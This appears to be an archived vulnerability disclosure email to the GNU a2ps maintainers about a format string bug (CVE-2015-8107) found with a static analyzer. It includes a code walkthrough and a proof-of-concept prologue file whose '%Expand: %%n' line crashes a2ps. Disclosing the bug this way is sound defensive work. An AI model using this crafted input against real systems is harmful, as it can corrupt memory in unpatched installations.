|
From: | 김종권 |
Subject: | Format string bug report in a2ps |
Date: | Thu, 12 Nov 2015 14:40:31 +0900 |
User-agent: | Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Thunderbird/38.3.0 |
Dear Gnu-a2ps team,
I am writing this to report a format string vulnerability in a2ps. (4.14, which is the latest version) Also I already have been assigned a CVE identifier from MITRE "CVE-2015-8107", so I want to make public this vulnerability. - Target Platform Linux - Target Version 4.14 (Latest Version) - Vulnerability description When user runs a2ps with malicious crafted pro(a2ps prologue) file, an attacker can execute arbitrary code. The function output_file processes the %Expand command in pro file. The variable `expansion' in the function output_file may hold a malicious input string, which can be used as a format argument of vsprintf. -- Step 1. (ouput.c 524 line) 524 expansion = ((char *) expand_user_string (job, FIRST_FILE (job), (const uchar *) "Expand: requirement", (const uchar *) token)); For instance, the variable expansion will point to the string “%n” when a text line "%Expand: %%\n” exists in an input pro file. -- Step 2. (output.c 525 line) 525 output (dest, expansion); output() is called in line 525, and the argument `expansion' is used as a format string, which can be malicious, as we described in step 1. -- Step 3. (output.c 873 line) 182 void output (struct output * out, const char *format, ...){ ... 202 ds_unsafe_cat_vsprintf (out->chunk,format, args); ... The variable format, which can be malicious, can be passed to ds_unsafe_cat_vsprintf() in line 202. -- step 4. (dstring.c 321 line) 321 void ds_unsafe_cat_vsprintf (struct dstring * ds, const char *format, va_list args){ ... 326 vsprintf (ds->content + ds->len, format, args); ... The value of format, which can be malicious, is used as an argument of vsprintf in line 326, therefore arbitrary code can be executed. -- Step 4. Our malicious input "exploit.pro" =================================== % -*-postscript-*- % PostScript Prologue % % $Id: matrix.pro,v 1.1.1.1.2.1 2007/12/29 01:58:27 mhatta Exp $ % % % This file is part of a2ps. % % This program is free software; you can redistribute it and/or modify % it under the terms of the GNU General Public License as published by % the Free Software Foundation; either version 3, or (at your option) % any later version. % % This program is distributed in the hope that it will be useful, % but WITHOUT ANY WARRANTY; without even the implied warranty of % MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the % GNU General Public License for more details. % % You should have received a copy of the GNU General Public License % along with this program; see the file COPYING. If not, write to % the Free Software Foundation, 59 Temple Place - Suite 330, % Boston, MA 02111-1307, USA. % Documentation The layout is the same as samp(bw)samp, but alternating gray and white lines. There are two macros defining the behavior: samp(pro.matrix.cycle)samp defines the length of the cycle (number of white and gray lines). It defaults to 6. samp(pro.matrix.gray)samp defines the number of gray lines. Default is 3. EndDocumentation % -- code follows this line -- %%IncludeResource: file base.ps %%IncludeResource: file a2ps.hdr %%BeginResource: procset a2ps-matrix-Prolog 2.0 1 % Function T(ab), jumps to the n-th tabulation in the current line /T { cw mul x0 add y0 moveto } bind def % Function n: move to the next line /n { %def /y0 y0 bfs sub store % Draw a grey background /nline nline 1 add def % @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ % @@@@@@@@@@@@@@ Malicious user input @@@@@@@@@@@@@@@ %Expand: %%n % @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ %Expand: nline #{pro.matrix.cycle:-6} mod #{pro.matrix.gray:-3} ge { gsave newpath x v get y0 currentfont /Descent get currentfontsize mul add moveto pw 0 rlineto 0 bfs rlineto pw neg 0 rlineto closepath 0.9 setgray fill grestore } if x0 y0 moveto } bind def % Function N: show and move to the next line /N { Show n } bind def /S { Show } bind def /p { false UL false BX %Face: Plain Courier bfs Show } bind def /sy { false UL false BX %Face: Symbol Symbol bfs Show } bind def /k { false UL false BX %Face: Keyword Courier-Oblique bfs Show } bind def /K { false UL false BX %Face: Keyword_strong Courier-Bold bfs Show } bind def /c { false UL false BX %Face: Comment Courier-Oblique bfs Show } bind def /C { false UL false BX %Face: Comment_strong Courier-BoldOblique bfs Show } bind def /l { false UL false BX %Face: Label Helvetica bfs Show } bind def /L { false UL false BX %Face: Label_strong Helvetica-Bold bfs Show } bind def /str{ false UL false BX %Face: String Times-Roman bfs Show } bind def /e{ false UL true BX %Face: Error Helvetica-Bold bfs Show } bind def %%EndResource %%BeginSetup % The font for line numbering /f# /Helvetica findfont bfs .6 mul scalefont def /nline 0 def %%EndSetup =================================== Execute =================================== ~ $ a2ps --version GNU a2ps 4.14 Written by Akim Demaille, Miguel Santana. Copyright (c) 1988-1993 Miguel Santana Copyright (c) 1995-2000 Akim Demaille, Miguel Santana Copyright (c) 2007- Akim Demaille, Miguel Santana and Masayuki Hatta This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. ~ $ a2ps --prologue=exploit test.tex -o test.ps aborted (core dumped) =================================== - How we found the vulnerability We used a static analyzer, Sparrow[1], to find the format string bug. Our analyzer reported an alarm in a2ps dstring.c 326 line, So we looked for a a2ps source code and found the bug. Sparrow is a state-of-the-art static analyzer that aims to verify the absence of fatal bugs in C source. Sparrow is designed by Abstract Interpretation and the analysis is sound in design. Sparrow adopts a number of well-founded static analysis techniques[2,3] for scalability, precision, and user convenience. References [1]: http://ropas.snu.ac.kr/sparrow/ [2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14. [3]: Design and Implementation of Sparse Global Analyses for C-like Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun Yi. PLDI'12 Sincerely, Woosuk Lee & Jong-Gwon Kim ----------------------------- Woosuk Lee Ph.D. candidate ROPAS lab. (http://ropas.snu.ac.kr/) ROSAEC center (http://rosaec.snu.ac.kr/) Seoul National University (tel) +82-2-880-1865 (email) address@hidden ----------------------------- ----------------------------- Jong-Gwon Kim Graduate student ROPAS lab. (http://ropas.snu.ac.kr/) ROSAEC center (http://rosaec.snu.ac.kr/) Seoul National University (tel) +82-2-880-1865 (email) address@hidden ----------------------------- |
[Prev in Thread] | Current Thread | [Next in Thread] |